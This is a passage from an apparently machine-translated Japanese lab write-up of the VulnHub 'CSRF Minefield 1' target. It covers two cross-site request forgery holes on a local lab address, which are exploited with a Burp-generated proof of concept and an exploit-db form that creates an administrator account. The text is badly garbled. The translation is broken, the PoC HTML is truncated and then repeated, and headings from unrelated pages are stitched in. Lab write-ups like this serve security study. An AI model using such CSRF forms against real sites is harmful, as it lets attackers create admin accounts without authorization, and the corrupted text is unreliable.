CSRF Minefield 1ターゲットフィールド***

4385 ワード

ターゲットフィールドのダウンロードリンクhttps://www.vulnhub.com/entry/csrf-minefield-1,316/
2か所の抜け穴.
最初の場所:http://192.168.110.208/hotelcal/admin/add_account.php元のパスワードadminにアクセスします.admin1.まずウェブサイトにアクセスするクリックして新しいユーザー

を作成します
2.アカウントを作成した後、bpブロックを使用してパケット

をキャプチャする
3.Cookie tokenが使用されていないことを発見し、そのパケットをburpsuiteプラグインCSRF POC(burpsuiteでダウンロード可能)に送信すると、自分でパスワードアカウントを変更することができ、以下の通りである:

4.生産するPOCをcsrfpocとして保存する.htmまたは直接レプリケーションアドレスにアクセスすると、ユーザー

の作成に成功します.
2番目:http://192.168.110.208/oop/admin/addUser.php元のパスワードadminにアクセスします.123
まず私はhttps://www.exploit-db.com/中捜のOOP CMS Blog 1.0は1つが管理人を創建することを発見して、今実現します:1.私はまず上のpocをダウンロードしてから彼のip、パスを私自身に変えて、最後にhtmlファイルを生成します.

# POC: 
# 2)
# http://192.168.110.208/oop/admin/addUser.php
# 



                    


User Name







Full Name







User Password







Email







Details

 
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td/> 
<td>
<input name="submit" value="Create" type="submit"/>
</td>
</tr>
</tbody>
</table>
</form>

</code></pre> 
  <p>2.       ，  ：<br/><a href="https://img.md5.com/image/info3/a0305e60ed4146ffbebda0dd58cdc8bc.jpg" target="_blank"><img src="https://s1.md5.ltd/image/205c0e3ebfd3b2abd6a9c37f597de254.jpg" alt="CSRF Minefield 1  ***_ 5   " width="650" height="340" style="border:1px solid black;" class="check_url_is_full"/></a><br/>3.      ，  、           ,              ，         <br/><a href="https://img.md5.com/image/info3/e58bd63d11624fe2b1904fa5c2f26217.jpg" target="_blank"><img src="https://s1.md5.ltd/image/ab0886625d1529e5c17c4191058fb596.jpg" alt="CSRF Minefield 1  ***_ 6   " width="650" height="367" style="border:1px solid black;" class="check_url_is_full"/></a></p> 
 </div> 
</div>
                            </div>
                        </div>

Openrestyベストケース|第3編:Openrestyのインストール

iOS周りの証明書を確認する

User Name
Full Name
User Password
Email
Details	</td> </tr> <tr> <td> <label>User Roll</label> </td> <td> <select id="select" name="role"> <option>Select User Role</option> <option value="0">Admin</option> <option value="1">Author</option> <option value="2">Editor</option> </select> </td> </tr> <tr> <td/> <td> <input name="submit" value="Create" type="submit"/> </td> </tr> </tbody> </table> </form> </code></pre> <p>2. ，：<br/><a href="https://img.md5.com/image/info3/a0305e60ed4146ffbebda0dd58cdc8bc.jpg" target="_blank"><img src="https://s1.md5.ltd/image/205c0e3ebfd3b2abd6a9c37f597de254.jpg" alt="CSRF Minefield 1 *_ 5 " width="650" height="340" style="border:1px solid black;" class="check_url_is_full"/></a><br/>3. ，、 , ， <br/><a href="https://img.md5.com/image/info3/e58bd63d11624fe2b1904fa5c2f26217.jpg" target="_blank"><img src="https://s1.md5.ltd/image/ab0886625d1529e5c17c4191058fb596.jpg" alt="CSRF Minefield 1 *_ 6 " width="650" height="367" style="border:1px solid black;" class="check_url_is_full"/></a></p> </div> </div> </div> </div>